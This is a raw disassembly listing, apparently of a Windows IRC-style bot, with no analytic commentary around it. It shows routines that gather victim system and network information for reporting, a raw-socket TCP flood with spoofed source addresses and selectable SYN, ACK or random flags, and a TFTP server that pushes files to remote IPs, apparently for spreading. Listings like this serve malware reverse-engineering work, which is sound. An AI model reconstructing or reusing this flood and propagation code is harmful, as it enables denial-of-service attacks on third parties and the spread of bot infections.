loc_412C0B: ; CODE XREF: sub_412B6A+66�j
; sub_412B6A+75�j
mov [ebp+70h+var_4], offset a??? ; "???"
loc_412C12: ; CODE XREF: sub_412B6A+60�j
; sub_412B6A+6F�j ...
cmp [ebp+70h+var_BC], 2
jnz short loc_412C41
loc_412C18: ; CODE XREF: sub_412B6A+51�j
cmp [ebp+70h+var_B8], bl
jz short loc_412C41
lea eax, [ebp+70h+var_B8]
push eax
push [ebp+70h+var_4]
lea eax, [ebp+70h+var_2E8]
push offset aSS_5 ; "%s (%s)"
push eax
call sub_416975
lea eax, [ebp+70h+var_2E8]
add esp, 10h
mov [ebp+70h+var_4], eax
loc_412C41: ; CODE XREF: sub_412B6A+44�j
; sub_412B6A+AC�j ...
push 3Fh
pop ecx
xor eax, eax
mov [ebp+70h+var_25C], cx
lea edi, [ebp+70h+var_25A]
rep stosd
stosw
mov eax, dword_43A450
cmp eax, ebx
mov [ebp+70h+var_C], 100h
jz short loc_412C74
lea ecx, [ebp+70h+var_C]
push ecx
lea ecx, [ebp+70h+var_25C]
push ecx
call eax ; GetUserNameA
loc_412C74: ; CODE XREF: sub_412B6A+FB�j
push [ebp+70h+arg_4]
call sub_408894
pop ecx
push eax
call dword_43A434 ; inet_addr
push 2
mov [ebp+70h+var_8], eax
push 4
lea eax, [ebp+70h+var_8]
push eax
call dword_43A4B4 ; gethostbyaddr
cmp eax, ebx
jz short loc_412C9D
push dword ptr [eax]
jmp short loc_412CA2
; ---------------------------------------------------------------------------
loc_412C9D: ; CODE XREF: sub_412B6A+12D�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_412CA2: ; CODE XREF: sub_412B6A+131�j
lea eax, [ebp+70h+var_3E4]
push eax
call sub_416975
pop ecx
pop ecx
push 104h
lea eax, [ebp+70h+var_4E8]
push eax
call dword_422048 ; GetSystemDirectoryA
push 46h
lea eax, [ebp+70h+var_114]
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call dword_42209C ; GetDateFormatA
push 46h
lea eax, [ebp+70h+var_15C]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call dword_422098 ; GetTimeFormatA
push 8
pop ecx
xor eax, eax
lea edi, [ebp+70h+var_38]
rep stosd
lea eax, [ebp+70h+var_38]
push eax
call dword_422130 ; GlobalMemoryStatus
push ebx
push ebx
push ebx
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
call sub_41809F
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_7E8]
push eax
call sub_4032A8
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+70h+var_668]
push ebx
rep movsd
call sub_4129E9
add esp, 20h
push eax
lea eax, [ebp+70h+var_15C]
push eax
lea eax, [ebp+70h+var_114]
push eax
lea eax, [ebp+70h+var_25C]
push eax
push [ebp+70h+arg_4]
call sub_408894
pop ecx
push eax
lea eax, [ebp+70h+var_3E4]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
push [ebp+70h+var_C0]
lea eax, [ebp+70h+var_5E8]
push [ebp+70h+var_C4]
push [ebp+70h+var_C8]
push [ebp+70h+var_4]
push eax
lea eax, [ebp+70h+var_568]
push eax
mov eax, [ebp+70h+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_4031A4
pop ecx
pop ecx
push eax
mov eax, [ebp+70h+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_4031A4
pop ecx
pop ecx
push eax
call sub_412AB4
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+70h+arg_0]
call sub_416BCD
mov eax, [ebp+70h+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_412B6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_412DD1 proc near ; CODE XREF: sub_409848+3A5F�p
; sub_409848+4F41�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push edi
push 20h
pop ecx
xor eax, eax
cmp dword_43A540, eax
lea edi, [ebp+6Ch+var_8C]
rep stosd
pop edi
jnz short loc_412E37
push eax
push 80h
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_C]
push eax
call dword_43A510 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_412E18
lea eax, [ebp+6Ch+var_8C]
push offset dword_42B6E4
push eax
call sub_416975
pop ecx
pop ecx
loc_412E18: ; CODE XREF: sub_412DD1+35�j
test [ebp+6Ch+var_C], 1
lea eax, [ebp+6Ch+var_8]
jz short loc_412E30
push offset dword_42B6DC
loc_412E26: ; CODE XREF: sub_412DD1+64�j
push eax
call sub_416975
pop ecx
pop ecx
jmp short loc_412E55
; ---------------------------------------------------------------------------
loc_412E30: ; CODE XREF: sub_412DD1+4E�j
push offset dword_42B6D8
jmp short loc_412E26
; ---------------------------------------------------------------------------
loc_412E37: ; CODE XREF: sub_412DD1+1D�j
push esi
mov esi, offset off_42B6D4
lea eax, [ebp+6Ch+var_8]
push esi
push eax
call sub_416975
lea eax, [ebp+6Ch+var_8C]
push esi
push eax
call sub_416975
add esp, 10h
pop esi
loc_412E55: ; CODE XREF: sub_412DD1+5D�j
push [ebp+6Ch+arg_4]
push [ebp+6Ch+arg_8]
call sub_408894
pop ecx
push eax
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+6Ch+arg_0]
call sub_416BCD
mov eax, [ebp+6Ch+arg_0]
add esp, 1Ch
add ebp, 6Ch
leave
retn
sub_412DD1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_412E87 proc near ; DATA XREF: sub_409848+597F�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 440h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+74h+var_240]
rep movsd
mov esi, dword_422004
mov dword ptr [eax+19Ch], 1
push 0Eh
xor eax, eax
xor ebx, ebx
mov [ebp+74h+var_A0], bl
pop ecx
lea edi, [ebp+74h+var_9F]
rep stosd
stosw
stosb
call esi ; GetTickCount
push eax
call sub_416B24
pop ecx
push 0FFh
push 3
push 2
call dword_43A3BC ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_412F10
call dword_43A47C ; WSAGetLastError
push eax
push offset aTcpErrorSocket ; "[TCP]: Error: socket() failed, returned"...
loc_412EF3: ; CODE XREF: sub_412E87+B1�j
lea eax, [ebp+74h+var_440]
push eax
call sub_416975
add esp, 0Ch
loc_412F02: ; CODE XREF: sub_412E87+D8�j
; sub_412E87+3DE�j
cmp [ebp+74h+var_A8], ebx
jnz loc_413215
jmp loc_4131F5
; ---------------------------------------------------------------------------
loc_412F10: ; CODE XREF: sub_412E87+5E�j
push 4
lea ecx, [ebp+74h+var_34]
push ecx
push 2
push ebx
push eax
mov [ebp+74h+var_34], 1
call dword_43A3D8 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_412F3A
call dword_43A47C ; WSAGetLastError
push eax
push offset aTcpErrorSetsoc ; "[TCP]: Error: setsockopt() failed, retu"...
jmp short loc_412EF3
; ---------------------------------------------------------------------------
loc_412F3A: ; CODE XREF: sub_412E87+A3�j
lea eax, [ebp+74h+var_23C]
push eax
call dword_43A434 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_412F61
loc_412F4C: ; DATA XREF: .text:off_42B6D4�o
lea eax, [ebp+74h+var_440]
push offset aTcpInvalidTarg ; "[TCP]: Invalid target IP."
push eax
call sub_416975
pop ecx
pop ecx
jmp short loc_412F02
; ---------------------------------------------------------------------------
loc_412F61: ; CODE XREF: sub_412E87+C3�j
xor eax, eax
lea edi, [ebp+74h+var_44]
stosd
stosd
stosd
stosd
push ebx
mov [ebp+74h+var_44], 2
call dword_43A514 ; ntohs
mov [ebp+74h+var_42], ax
lea eax, [ebp+74h+var_23C]
push eax
call dword_43A434 ; inet_addr
mov [ebp+74h+var_40], eax
mov [ebp+74h+arg_0], ebx
call esi ; GetTickCount
mov [ebp+74h+var_1C], eax
call esi ; GetTickCount
sub eax, [ebp+74h+var_1C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+74h+var_B4]
ja loc_4131AD
mov [ebp+74h+var_30], 45h
mov [ebp+74h+var_2C], 1
mov [ebp+74h+var_2A], bx
mov [ebp+74h+var_28], 80h
mov [ebp+74h+var_27], 6
mov [ebp+74h+var_C], 50h
mov [ebp+74h+var_6], bx
loc_412FC8: ; CODE XREF: sub_412E87+320�j
push 28h
call dword_43A514 ; ntohs
cmp [ebp+74h+var_B0], ebx
mov [ebp+74h+var_2E], ax
mov [ebp+74h+var_26], bx
jz short loc_413004
call sub_416B31
mov esi, eax
shl esi, 8
call sub_416B31
add esi, eax
shl esi, 8
call sub_416B31
add esi, eax
shl esi, 8
call sub_416B31
add esi, eax
jmp short loc_413019
; ---------------------------------------------------------------------------
loc_413004: ; CODE XREF: sub_412E87+154�j
push [ebp+74h+var_240]
call sub_408894
pop ecx
push eax
call dword_43A434 ; inet_addr
mov esi, eax
loc_413019: ; CODE XREF: sub_412E87+17B�j
cmp [ebp+74h+var_B8], ebx
mov edi, [ebp+74h+var_40]
mov [ebp+74h+var_24], esi
mov [ebp+74h+var_20], edi
jnz short loc_413037
call sub_416B31
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_41303A
; ---------------------------------------------------------------------------
loc_413037: ; CODE XREF: sub_412E87+19E�j
push [ebp+74h+var_B8]
loc_41303A: ; CODE XREF: sub_412E87+1AE�j
call dword_43A514 ; ntohs
mov [ebp+74h+var_16], ax
call sub_416B31
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_43A514 ; ntohs
push 12345678h
mov [ebp+74h+var_18], ax
call dword_43A4EC ; ntohl
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_41308A
mov [ebp+74h+var_10], ebx
mov [ebp+74h+var_B], 2
jmp short loc_4130E6
; ---------------------------------------------------------------------------
loc_41308A: ; CODE XREF: sub_412E87+1F8�j
lea eax, [ebp+74h+var_1BC]
push offset aAck ; "ack"
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_4130AA
mov [ebp+74h+var_10], ebx
mov [ebp+74h+var_B], 10h
jmp short loc_4130E6
; ---------------------------------------------------------------------------
loc_4130AA: ; CODE XREF: sub_412E87+218�j
lea eax, [ebp+74h+var_1BC]
push offset aRandom_0 ; "random"
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_4130E6
call sub_416B31
cdq
push 3
pop ecx
idiv ecx
mov [ebp+74h+var_10], edx
call sub_416B31
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+74h+var_B], dl
loc_4130E6: ; CODE XREF: sub_412E87+201�j
; sub_412E87+221�j ...
push 200h
call dword_43A514 ; ntohs
push 14h
mov [ebp+74h+var_A], ax
mov [ebp+74h+var_8], bx
mov [ebp+74h+var_64], esi
mov [ebp+74h+var_60], edi
mov [ebp+74h+var_5C], bl
mov [ebp+74h+var_5B], 6
call dword_43A514 ; ntohs
push 8
pop ecx
mov [ebp+74h+var_5A], ax
push 5
lea esi, [ebp+74h+var_64]
lea edi, [ebp+74h+var_A0]
rep movsd
pop ecx
lea eax, [ebp+74h+var_A0]
push 34h
lea esi, [ebp+74h+var_18]
lea edi, [ebp+74h+var_80]
push eax
rep movsd
call sub_4088EA
push 5
pop ecx
push 5
lea esi, [ebp+74h+var_30]
lea edi, [ebp+74h+var_A0]
rep movsd
mov [ebp+74h+var_8], ax
pop ecx
lea esi, [ebp+74h+var_18]
lea edi, [ebp+74h+var_8C]
rep movsd
xor eax, eax
lea edi, [ebp+74h+var_78]
stosd
lea eax, [ebp+74h+var_A0]
push 28h
push eax
call sub_4088EA
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+74h+var_26], ax
lea eax, [ebp+74h+var_44]
push eax
push ebx
push 3Ch
lea eax, [ebp+74h+var_A0]
push eax
push [ebp+74h+var_4]
lea esi, [ebp+74h+var_30]
lea edi, [ebp+74h+var_A0]
rep movsd
call dword_43A38C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_413232
inc [ebp+74h+arg_0]
call dword_422004 ; GetTickCount
sub eax, [ebp+74h+var_1C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+74h+var_B4]
jbe loc_412FC8
loc_4131AD: ; CODE XREF: sub_412E87+11D�j
push [ebp+74h+var_4]
call dword_43A4D0 ; closesocket
mov eax, [ebp+74h+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+74h+var_B4]
shr ecx, 14h
push ecx
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_23C]
push eax
lea eax, [ebp+74h+var_1BC]
push eax
lea eax, [ebp+74h+var_440]
push offset aTcpDoneWithSFl ; "[TCP]: Done with %s flood to IP: %s. Se"...
push eax
call sub_416975
add esp, 1Ch
cmp [ebp+74h+var_A8], ebx
jnz short loc_413215
loc_4131F5: ; CODE XREF: sub_412E87+84�j
push ebx
push [ebp+74h+var_AC]
lea eax, [ebp+74h+var_440]
push eax
lea eax, [ebp+74h+var_13C]
push eax
push [ebp+74h+var_240]
call sub_405D62
add esp, 14h
loc_413215: ; CODE XREF: sub_412E87+7E�j
; sub_412E87+36C�j
lea eax, [ebp+74h+var_440]
push eax
call sub_401F0F
push [ebp+74h+var_BC]
call sub_4139F6
pop ecx
pop ecx
push ebx
call dword_422014 ; ExitThread
loc_413232: ; CODE XREF: sub_412E87+302�j
push [ebp+74h+var_4]
call dword_43A4D0 ; closesocket
call dword_43A47C ; WSAGetLastError
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_23C]
push eax
push offset aTcpErrorSendin ; "[TCP]: Error sending packets to IP: %s."...
lea eax, [ebp+74h+var_440]
push 200h
push eax
call sub_416BCD
add esp, 18h
jmp loc_412F02
sub_412E87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41326A proc near ; CODE XREF: sub_41326A:loc_413723�p
; DATA XREF: sub_401141+104�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 884h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, offset aOctet ; "octet"
lea edi, [ebp+74h+var_1C]
movsd
movsw
xor ebx, ebx
push ebx
xor eax, eax
inc eax
mov esi, edx
push 2
mov ecx, 0A9h
lea edi, [ebp+74h+var_37C]
rep movsd
inc [ebp+74h+var_16C]
push 2
mov [ebp+74h+var_10], eax
mov [edx+2A0h], eax
call dword_43A3BC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+74h+var_4], esi
jnz short loc_413326
push 190h
call dword_422000 ; Sleep
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpErrorSocke ; "[TFTP]: Error: socket() failed, returne"...
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+74h+var_E0], ebx
jnz short loc_413309
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_405D62
add esp, 14h
loc_413309: ; CODE XREF: sub_41326A+7D�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401F0F
push [ebp+74h+var_170]
call sub_4139F6
pop ecx
jmp loc_41370F
; ---------------------------------------------------------------------------
loc_413326: ; CODE XREF: sub_41326A+52�j
mov eax, [ebp+74h+var_170]
push [ebp+74h+var_168]
imul eax, 234h
mov dword_43B26C[eax], esi
xor eax, eax
lea edi, [ebp+74h+var_44]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_44], 2
call dword_43A514 ; ntohs
mov [ebp+74h+var_42], ax
push 10h
lea eax, [ebp+74h+var_44]
push eax
push esi
mov [ebp+74h+var_40], ebx
call dword_43A49C ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_413385
push 1388h
call dword_422000 ; Sleep
dec [ebp+74h+var_16C]
push [ebp+74h+arg_0]
jmp loc_413723
; ---------------------------------------------------------------------------
loc_413385: ; CODE XREF: sub_41326A+100�j
lea eax, [ebp+74h+var_378]
push offset dword_422990
push eax
call sub_41720C
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+74h+var_8], eax
jnz short loc_4133FE
push 190h
call dword_422000 ; Sleep
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_780]
push offset aTftpFailedToOp ; "[TFTP]: Failed to open file: %s."
push eax
call sub_416975
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_405D62
lea eax, [ebp+74h+var_780]
push eax
call sub_401F0F
push [ebp+74h+var_170]
call sub_4139F6
add esp, 28h
jmp loc_413710
; ---------------------------------------------------------------------------
loc_4133FE: ; CODE XREF: sub_41326A+133�j
mov esi, 200h
loc_413403: ; CODE XREF: sub_41326A+471�j
mov edi, [ebp+74h+arg_0]
cmp [edi+2A0h], ebx
jz loc_4136E4
mov eax, [ebp+74h+var_4]
push 20h
pop ecx
mov [ebp+74h+var_880], eax
xor eax, eax
lea edi, [ebp+74h+var_D8]
rep stosd
lea eax, [ebp+74h+var_34]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_884]
push eax
push ebx
mov [ebp+74h+var_34], 5
mov [ebp+74h+var_30], 1388h
mov [ebp+74h+var_884], 1
call dword_43A468 ; select
test eax, eax
jle loc_4136D8
xor eax, eax
mov edx, 80h
mov [ebp+74h+var_580], bl
mov ecx, edx
lea edi, [ebp+74h+var_57F]
rep stosd
stosw
stosb
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push edx
lea eax, [ebp+74h+var_D8]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_C], 10h
call dword_43A348 ; recvfrom
push [ebp+74h+var_28]
mov [ebp+74h+var_10], eax
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_58]
push eax
call sub_416975
cmp [ebp+74h+var_D8], bl
pop ecx
pop ecx
jnz loc_4136C0
cmp [ebp+74h+var_D7], 1
jnz loc_41361B
lea eax, [ebp+74h+var_274]
lea edx, [eax+1]
loc_4134C5: ; CODE XREF: sub_41326A+260�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4134C5
sub eax, edx
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+var_274]
lea edi, [eax+1]
loc_4134DA: ; CODE XREF: sub_41326A+275�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4134DA
sub eax, edi
push eax
lea eax, [ebp+74h+var_D6]
push eax
lea eax, [ebp+74h+var_274]
push eax
call sub_418270
add esp, 0Ch
test eax, eax
jnz loc_4135D9
lea eax, [ebp+74h+var_1C]
lea edx, [eax+1]
loc_413505: ; CODE XREF: sub_41326A+2A0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_413505
sub eax, edx
push eax
mov eax, [ebp+74h+var_14]
lea eax, [ebp+eax+74h+var_D5]
push eax
lea eax, [ebp+74h+var_1C]
push eax
call sub_418270
add esp, 0Ch
test eax, eax
jnz loc_4135D9
push ebx
push ebx
push [ebp+74h+var_8]
call sub_4185E7
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
mov [ebp+74h+var_57E], bl
mov [ebp+74h+var_57D], 1
call sub_416FB7
add esp, 1Ch
push [ebp+74h+var_C]
lea ecx, [ebp+74h+var_2C]
push ecx
mov [ebp+74h+var_10], eax
push ebx
add eax, 4
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
call dword_43A38C ; sendto
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTransf ; "[TFTP]: File transfer started to IP: %s"...
loc_413593: ; CODE XREF: sub_41326A+451�j
lea eax, [ebp+74h+var_780]
push eax
call sub_416975
add esp, 10h
cmp [ebp+74h+var_E0], ebx
jnz short loc_4135C7
push ebx
push [ebp+74h+var_E4]
lea eax, [ebp+74h+var_780]
push eax
lea eax, [ebp+74h+var_164]
push eax
push [ebp+74h+var_37C]
call sub_405D62
add esp, 14h
loc_4135C7: ; CODE XREF: sub_41326A+33B�j
lea eax, [ebp+74h+var_780]
push eax
call sub_401F0F
pop ecx
jmp loc_4136D8
; ---------------------------------------------------------------------------
loc_4135D9: ; CODE XREF: sub_41326A+28F�j
; sub_41326A+2BB�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 13h
push offset dword_42B874
push [ebp+74h+var_4]
call dword_43A38C ; sendto
lea eax, [ebp+74h+var_274]
push eax
lea eax, [ebp+74h+var_58]
push eax
lea eax, [ebp+74h+var_D8]
push offset aTftpFileNotFou ; "[TFTP]: File not found: %s (%s)."
push eax
call sub_416975
lea eax, [ebp+74h+var_D8]
push eax
call sub_401F0F
add esp, 14h
jmp loc_4136D8
; ---------------------------------------------------------------------------
loc_41361B: ; CODE XREF: sub_41326A+24C�j
cmp [ebp+74h+var_D7], 4
jnz loc_4136C0
mov cl, [ebp+74h+var_D5]
cmp cl, 0FFh
mov al, [ebp+74h+var_D6]
mov [ebp+74h+var_580], bl
mov [ebp+74h+var_57F], 3
jnz short loc_413649
inc al
xor cl, cl
mov [ebp+74h+var_57D], bl
jmp short loc_413651
; ---------------------------------------------------------------------------
loc_413649: ; CODE XREF: sub_41326A+3D1�j
inc cl
mov [ebp+74h+var_57D], cl
loc_413651: ; CODE XREF: sub_41326A+3DD�j
mov [ebp+74h+var_57E], al
movzx eax, al
shl eax, 8
movzx ecx, cl
add eax, ecx
shl eax, 9
push ebx
sub eax, esi
push eax
push [ebp+74h+var_8]
call sub_4185E7
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_57C]
push esi
push 1
push eax
call sub_416FB7
add esp, 1Ch
push [ebp+74h+var_C]
mov edi, eax
lea eax, [ebp+74h+var_2C]
push eax
push ebx
lea eax, [edi+4]
push eax
lea eax, [ebp+74h+var_580]
push eax
push [ebp+74h+var_4]
mov [ebp+74h+var_10], edi
call dword_43A38C ; sendto
cmp edi, ebx
jnz short loc_4136D8
lea eax, [ebp+74h+var_378]
push eax
lea eax, [ebp+74h+var_58]
push eax
push offset aTftpFileTran_0 ; "[TFTP]: File transfer complete to IP: %"...
jmp loc_413593
; ---------------------------------------------------------------------------
loc_4136C0: ; CODE XREF: sub_41326A+242�j
; sub_41326A+3B5�j
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_2C]
push eax
push ebx
push 9
push offset dword_42B814
push [ebp+74h+var_4]
call dword_43A38C ; sendto
loc_4136D8: ; CODE XREF: sub_41326A+1E9�j
; sub_41326A+36A�j ...
cmp [ebp+74h+var_10], ebx
jg loc_413403
mov edi, [ebp+74h+arg_0]
loc_4136E4: ; CODE XREF: sub_41326A+1A2�j
push [ebp+74h+var_4]
call dword_43A4D0 ; closesocket
push [ebp+74h+var_8]
call sub_416E7D
dec [ebp+74h+var_16C]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_413717
push [ebp+74h+var_170]
call sub_4139F6
loc_41370F: ; CODE XREF: sub_41326A+B7�j
pop ecx
loc_413710: ; CODE XREF: sub_41326A+18F�j
push ebx
call dword_422014 ; ExitThread
loc_413717: ; CODE XREF: sub_41326A+498�j
push 3E8h
call dword_422000 ; Sleep
push edi
loc_413723: ; CODE XREF: sub_41326A+116�j
call sub_41326A
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_41326A endp
; =============== S U B R O U T I N E =======================================
sub_413732 proc near ; CODE XREF: sub_401141+ED�p
; sub_401141+237�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_43B060
loc_41373A: ; CODE XREF: sub_413732+18�j
cmp byte ptr [eax], 0
jz short loc_41374E
add eax, 234h
inc edi
cmp eax, offset dword_47FDF0
jl short loc_41373A
jmp short loc_413799
; ---------------------------------------------------------------------------
loc_41374E: ; CODE XREF: sub_413732+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_43B060[esi]
push eax
call sub_416A00
mov eax, [esp+14h+arg_4]
and dword_43B264[esi], 0
and dword_43B268[esi], 0
mov dword_43B260[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and byte_43B278[esi], 0
mov dword_43B26C[esi], eax
pop esi
loc_413799: ; CODE XREF: sub_413732+1A�j
mov eax, edi
pop edi
retn
sub_413732 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41379D proc near ; CODE XREF: sub_413A33+31�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
xor edi, edi
mov esi, offset dword_43B060
loc_4137C7: ; CODE XREF: sub_41379D+78�j
cmp byte ptr [esi], 0
jz short loc_413808
cmp [ebp+arg_C], 0
jnz short loc_4137DB
cmp dword ptr [esi+204h], 0
jnz short loc_413808
loc_4137DB: ; CODE XREF: sub_41379D+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_416975
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 24h
loc_413808: ; CODE XREF: sub_41379D+2D�j
; sub_41379D+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_47FDF0
jl short loc_4137C7
pop edi
pop esi
leave
retn
sub_41379D endp
; =============== S U B R O U T I N E =======================================
sub_41381B proc near ; CODE XREF: sub_409848+429B�p
; sub_4138A3+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_41389D
cmp esi, 1F4h
jge short loc_41389D
imul esi, 234h
push edi
push ebx
lea edi, dword_43B274[esi]
push dword ptr [edi]
call dword_4220F0 ; TerminateThread
cmp [edi], ebx
jz short loc_41384D
inc ebp
loc_41384D: ; CODE XREF: sub_41381B+2F�j
mov [edi], ebx
lea edi, dword_43B268[esi]
mov eax, [edi]
